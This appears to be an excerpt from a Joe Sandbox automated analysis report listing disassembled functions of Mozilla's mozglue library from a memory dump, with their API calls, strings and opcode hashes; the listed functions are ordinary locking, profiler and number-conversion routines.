                                                                  • API ID: free$Xlength_error@std@@
                                                                  • String ID: map/set<T> too long$3JT/
                                                                  • API String ID: 1922495194-3190786646
                                                                  • Opcode ID: 603bfd422d07ce53530c0ce4fa439727aa532a36da5a1ef1a9886d8921d2a3cc
                                                                  • Instruction ID: 96756133ede624ec1a6c1be4962c9b733c46d3cb020137f299809127a45dc9fb
                                                                  • Opcode Fuzzy Hash: 603bfd422d07ce53530c0ce4fa439727aa532a36da5a1ef1a9886d8921d2a3cc
                                                                  • Instruction Fuzzy Hash: 43617974A042458FD701CF59C8C0B9ABBE1FF4A718F98C599D8596BB52C332EC45CBA1
                                                                  APIs
                                                                    • Part of subcall function 6C08CBE8: GetCurrentProcess.KERNEL32(?,6C0531A7), ref: 6C08CBF1
                                                                    • Part of subcall function 6C08CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0531A7), ref: 6C08CBFA
                                                                  • EnterCriticalSection.KERNEL32(6C0DE784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C08D1C5), ref: 6C07D4F2
                                                                  • LeaveCriticalSection.KERNEL32(6C0DE784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C08D1C5), ref: 6C07D50B
                                                                    • Part of subcall function 6C05CFE0: EnterCriticalSection.KERNEL32(6C0DE784), ref: 6C05CFF6
                                                                    • Part of subcall function 6C05CFE0: LeaveCriticalSection.KERNEL32(6C0DE784), ref: 6C05D026
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C08D1C5), ref: 6C07D52E
                                                                  • EnterCriticalSection.KERNEL32(6C0DE7DC), ref: 6C07D690
                                                                  • LeaveCriticalSection.KERNEL32(6C0DE784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C08D1C5), ref: 6C07D751
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                  • String ID: MOZ_CRASH()$3JT/
                                                                  • API String ID: 3805649505-2610270569
                                                                  • Opcode ID: 80209688cf0af801e217bd6b618e66412a6fca0a122845d44479ef2802e7cc3d
                                                                  • Instruction ID: 82012498cfa92b4d629d9769890ae8d683eac57b55534b9a2b57df93535f8230
                                                                  • Opcode Fuzzy Hash: 80209688cf0af801e217bd6b618e66412a6fca0a122845d44479ef2802e7cc3d
                                                                  • Instruction Fuzzy Hash: BF51BF71A047018FD768CF28C49475AB7E5EF89704F558A2ED9A9C7B84DB70F840CB62
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldiv
                                                                  • String ID: -%llu$.$profiler-paused$3JT/
                                                                  • API String ID: 3732870572-2489170486
                                                                  • Opcode ID: ba3c696a9e9b6474cd67708e4b84ef7b6b0673c06173a9a4b13f789057572630
                                                                  • Instruction ID: d56d2d41dc68d5703d0421d7a1c8c2bf4257cd278d554006091f61dbbcd6b1a1
                                                                  • Opcode Fuzzy Hash: ba3c696a9e9b6474cd67708e4b84ef7b6b0673c06173a9a4b13f789057572630
                                                                  • Instruction Fuzzy Hash: 96417775E04708ABCB08CFF8D89125EBBF9EF85744F10862DE85597B42EF30A9458742
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09E3E4
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09E3F1
                                                                  • memset.VCRUNTIME140(?,00000000,?), ref: 6C09E4AB
                                                                    • Part of subcall function 6C065D40: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,?,?,6C09D2DA,00000001), ref: 6C065D66
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09E4F5
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09E577
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09E584
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09E5DE
                                                                  • memset.VCRUNTIME140(?,00000000,00000000), ref: 6C09E6DA
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C09E864
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C09E883
                                                                  • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C09E8A6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreememset$Xbad_function_call@std@@malloc
                                                                  • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$3JT/
                                                                  • API String ID: 905598890-3672379104
                                                                  • Opcode ID: e4ee3f2c218595b4fcc6d5e6b25fab10be5d77514fe5132ea12e52d2b11b6434
                                                                  • Instruction ID: 5b9a183a722c61349422052a6f483858da29dcb639b66ea856842c687a14fd45
                                                                  • Opcode Fuzzy Hash: e4ee3f2c218595b4fcc6d5e6b25fab10be5d77514fe5132ea12e52d2b11b6434
                                                                  • Instruction Fuzzy Hash: 46415874A01606DFCB14CF28C890BAABBF5BF4A304F14856DD9669BB81DB30E855CB90
                                                                  APIs
                                                                  • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C0C985D
                                                                  • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C0C987D
                                                                  • MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6C0C98DE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Printf$Target@mozilla@@$?vprint@Crash
                                                                  • String ID: ElementAt(aIndex = %zu, aLength = %zu)$3JT/
                                                                  • API String ID: 1778083764-3705640670
                                                                  • Opcode ID: 54aecf56a06aca94c18719529260739944c7437f5204345683adf5352f373ee7
                                                                  • Instruction ID: d1d71e098e915a4546e2dd6fc511a3b1e295ec5738b45269d72bb708c8e50cfc
                                                                  • Opcode Fuzzy Hash: 54aecf56a06aca94c18719529260739944c7437f5204345683adf5352f373ee7
                                                                  • Instruction Fuzzy Hash: A6319371B002085BDF14AF59DC546EE77E9DF45718F50842DEA1A9BB40DB31A9048BE1
                                                                  APIs
                                                                  • __aulldiv.LIBCMT ref: 6C0A4721
                                                                    • Part of subcall function 6C054410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C093EBD,00000017,?,00000000,?,6C093EBD,?,?,6C0542D2), ref: 6C054444
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldiv__stdio_common_vsprintf
                                                                  • String ID: -%llu$.$profiler-paused$3JT/
                                                                  • API String ID: 680628322-2489170486
                                                                  • Opcode ID: 5934f07e84dd852bf25b4f6f963890fc8cf625c33f67e7b4159db428060fa8e9
                                                                  • Instruction ID: fde1ea7ce9183376e52e05d62772c339b61cde27a83ebec10dc86373ae58838b
                                                                  • Opcode Fuzzy Hash: 5934f07e84dd852bf25b4f6f963890fc8cf625c33f67e7b4159db428060fa8e9
                                                                  • Instruction Fuzzy Hash: 08314875F042085BCB0CCFECD89139EBBE6DB88314F55813EE8059BB81EB70A9458B91
                                                                  APIs
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0B77FA
                                                                  • ?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6C0B7829
                                                                    • Part of subcall function 6C08CC38: GetCurrentProcess.KERNEL32(?,?,?,?,6C0531A7), ref: 6C08CC45
                                                                    • Part of subcall function 6C08CC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6C0531A7), ref: 6C08CC4E
                                                                  • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C0B789F
                                                                  • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C0B78CF
                                                                    • Part of subcall function 6C054DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C054E5A
                                                                    • Part of subcall function 6C054DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C054E97
                                                                    • Part of subcall function 6C054290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C093EBD,6C093EBD,00000000), ref: 6C0542A9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
                                                                  • String ID: 3JT/
                                                                  • API String ID: 2525797420-2178588373
                                                                  • Opcode ID: abd70ef6a5367222f60f6e24d4332f4758afc28f9aeea25686f0b9f2bb23ec5c
                                                                  • Instruction ID: 5e61225fbc1bbeddfaa9711d070abdd7527647f71f667875107f26812369ba1b
                                                                  • Opcode Fuzzy Hash: abd70ef6a5367222f60f6e24d4332f4758afc28f9aeea25686f0b9f2bb23ec5c
                                                                  • Instruction Fuzzy Hash: 9141CD719047469BD700DF29C48066AFBF4FF8A214F604A2EE4A987680DB31E959CB92
                                                                  APIs
                                                                  • ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C0ADB86
                                                                  • ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C0ADC0E
                                                                  • free.MOZGLUE(?), ref: 6C0ADC2E
                                                                  • free.MOZGLUE(?), ref: 6C0ADC40
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Impl@detail@mozilla@@Mutexfree
                                                                  • String ID: 3JT/
                                                                  • API String ID: 3186548839-2178588373
                                                                  • Opcode ID: 83c04d1f68ea132c01ec4b94be9a49b3864c517dafa97aab1dad55d2368aae01
                                                                  • Instruction ID: 8b7f969eff549dd270a8354954e2a64da5ce63a06c7c8800edf1e5a4a244affd
                                                                  • Opcode Fuzzy Hash: 83c04d1f68ea132c01ec4b94be9a49b3864c517dafa97aab1dad55d2368aae01
                                                                  • Instruction Fuzzy Hash: 1B4187B56047009FC714CFB5C488B9ABBF6BF88358F54882DE8AA87741EB30E945CB51
                                                                  APIs
                                                                    • Part of subcall function 6C054290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C093EBD,6C093EBD,00000000), ref: 6C0542A9
                                                                  • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C0AB127), ref: 6C0AB463
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0AB4C9
                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C0AB4E4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: _getpidstrlenstrncmptolower
                                                                  • String ID: pid:$3JT/
                                                                  • API String ID: 1720406129-1990143079
                                                                  • Opcode ID: c7d105c7ad44159c4528996f29bcb417c2b7ba4cf82a188f2203daad76d79720
                                                                  • Instruction ID: ef9862ec6113f53f7d1076f8be068710373e2c53889131e53c598447e36118c8
                                                                  • Opcode Fuzzy Hash: c7d105c7ad44159c4528996f29bcb417c2b7ba4cf82a188f2203daad76d79720
                                                                  • Instruction Fuzzy Hash: F531D331A012189FDB10DFE9D880BEEB7F5BF49718F540529D81167A42DB32B986CBA1
                                                                  APIs
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C090222
                                                                  • moz_xmalloc.MOZGLUE(0000000C), ref: 6C090231
                                                                    • Part of subcall function 6C06CA10: malloc.MOZGLUE(?), ref: 6C06CA26
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C09028B
                                                                  • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 6C0902F7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireFreeHeapReleasemallocmoz_xmalloc
                                                                  • String ID: @
                                                                  • API String ID: 2782572024-2766056989
                                                                  • Opcode ID: 7e420c8f4e7012382e47a4eeac3e02d0ab0ed245f414ebed3e5ab0219079366b
                                                                  • Instruction ID: 5daecd59c536a815c0255896d8e297a7f9f68171832ae75715b855679303bc86
                                                                  • Opcode Fuzzy Hash: 7e420c8f4e7012382e47a4eeac3e02d0ab0ed245f414ebed3e5ab0219079366b
                                                                  • Instruction Fuzzy Hash: F4319DB2B046518FEB54CF59C880B1AB7F5EF49718B24852DDA5ADBB40D731EC01CB92
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C0982BC,?,?), ref: 6C09649B
                                                                    • Part of subcall function 6C06CA10: malloc.MOZGLUE(?), ref: 6C06CA26
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0964A9
                                                                    • Part of subcall function 6C08FA80: GetCurrentThreadId.KERNEL32 ref: 6C08FA8D
                                                                    • Part of subcall function 6C08FA80: AcquireSRWLockExclusive.KERNEL32(6C0DF448), ref: 6C08FA99
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C09653F
                                                                  • free.MOZGLUE(?), ref: 6C09655A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                  • String ID: 3JT/
                                                                  • API String ID: 3596744550-2178588373
                                                                  • Opcode ID: 69c910f6204bdefaeafe2af4d773b0f25f3747652e8cf423fb4c15397ce65fdb
                                                                  • Instruction ID: 45ef5e35594c3978b4b2d2de2c070919a226a7656c4db0d0ba3875565e98e22a
                                                                  • Opcode Fuzzy Hash: 69c910f6204bdefaeafe2af4d773b0f25f3747652e8cf423fb4c15397ce65fdb
                                                                  • Instruction Fuzzy Hash: 103150B5A043059FDB44CF14D88479ABBE5BF89314F40842DE85A97751DB30F919CB92
                                                                  APIs
                                                                  • free.MOZGLUE(?), ref: 6C0AA315
                                                                  • ?_Xbad_function_call@std@@YAXXZ.MSVCP140(?), ref: 6C0AA31F
                                                                  • free.MOZGLUE(00000000,?,?,?,?), ref: 6C0AA36A
                                                                    • Part of subcall function 6C075E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C075EDB
                                                                    • Part of subcall function 6C075E90: memset.VCRUNTIME140(6C0B7765,000000E5,55CCCCCC), ref: 6C075F27
                                                                    • Part of subcall function 6C075E90: LeaveCriticalSection.KERNEL32(?), ref: 6C075FB2
                                                                    • Part of subcall function 6C0A2140: free.MOZGLUE(?,00000060,?,6C0A7D36,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0A215D
                                                                  • free.MOZGLUE(00000000), ref: 6C0AA37C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: free$CriticalSection$EnterLeaveXbad_function_call@std@@memset
                                                                  • String ID: 3JT/
                                                                  • API String ID: 700533648-2178588373
                                                                  • Opcode ID: d77fe58aecd17e9df7c8f087aec2280568d60bf7c4edcda5cfd2281199bc253c
                                                                  • Instruction ID: 862cb4ed1a028e2135c78cfc5da22362bd967c25818136b53a91641df2696c7e
                                                                  • Opcode Fuzzy Hash: d77fe58aecd17e9df7c8f087aec2280568d60bf7c4edcda5cfd2281199bc253c
                                                                  • Instruction Fuzzy Hash: B42107B6A042249BCB159F86C800B9FB7E9EF86718F548015ED095B742DB32FD07CAD2
                                                                  APIs
                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,6C0756EE,?,00000001), ref: 6C075B85
                                                                  • EnterCriticalSection.KERNEL32(6C0DF688,?,?,?,6C0756EE,?,00000001), ref: 6C075B90
                                                                  • LeaveCriticalSection.KERNEL32(6C0DF688,?,?,?,6C0756EE,?,00000001), ref: 6C075BD8
                                                                  • GetTickCount64.KERNEL32 ref: 6C075BE4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Count64CounterEnterLeavePerformanceQueryTick
                                                                  • String ID: 3JT/
                                                                  • API String ID: 2796706680-2178588373
                                                                  • Opcode ID: c4114f74e4dd3508f2a981d3f3a9ad226f7348ffc796ea4a32619c08fa2e39b2
                                                                  • Instruction ID: 81a22e21f1918b96a370a157a33db2721e0ea955409dd028c0147c5121a6a77e
                                                                  • Opcode Fuzzy Hash: c4114f74e4dd3508f2a981d3f3a9ad226f7348ffc796ea4a32619c08fa2e39b2
                                                                  • Instruction Fuzzy Hash: 452191757053049FCB08CF68C85565ABBF9EBCA210F04C92EE9AA87790DB30B904CB91
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0A1B98
                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,6C0A1D96,00000000), ref: 6C0A1BA1
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,6C0A1D96,00000000), ref: 6C0A1BB5
                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0A1C25
                                                                    • Part of subcall function 6C0A1C60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,6C0A759E,?,?), ref: 6C0A1CB4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentNow@ReleaseStamp@mozilla@@ThreadTimeV12@_free
                                                                  • String ID: 3JT/
                                                                  • API String ID: 3699359333-2178588373
                                                                  • Opcode ID: ccbed5aa8c7eb41bf98687b2a37e2c4f988f9a2387d7d1b38ffb890fb464ed83
                                                                  • Instruction ID: 05ccc0798c023d5c49a570dd4176542970b8bfd04816fe124ba7f622e22f3442
                                                                  • Opcode Fuzzy Hash: ccbed5aa8c7eb41bf98687b2a37e2c4f988f9a2387d7d1b38ffb890fb464ed83
                                                                  • Instruction Fuzzy Hash: 4221D070A04214EBDB049FE5C8847AFBBF4AF4A348F10441DD9166BB52DB75E806CBD1
                                                                  APIs
                                                                  • SetLastError.KERNEL32(00000000), ref: 6C0B7526
                                                                  • __Init_thread_footer.LIBCMT ref: 6C0B7566
                                                                  • __Init_thread_footer.LIBCMT ref: 6C0B7597
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Init_thread_footer$ErrorLast
                                                                  • String ID: UnmapViewOfFile2$kernel32.dll
                                                                  • API String ID: 3217676052-1401603581
                                                                  • Opcode ID: bfe669a0407bfdb7c2ef6fa9839336892fe016572261711be1a58c092e639945
                                                                  • Instruction ID: d8d377059fbac7c8d4066261107f2ddd696564888990cecfd8ee58e62b42e1a3
                                                                  • Opcode Fuzzy Hash: bfe669a0407bfdb7c2ef6fa9839336892fe016572261711be1a58c092e639945
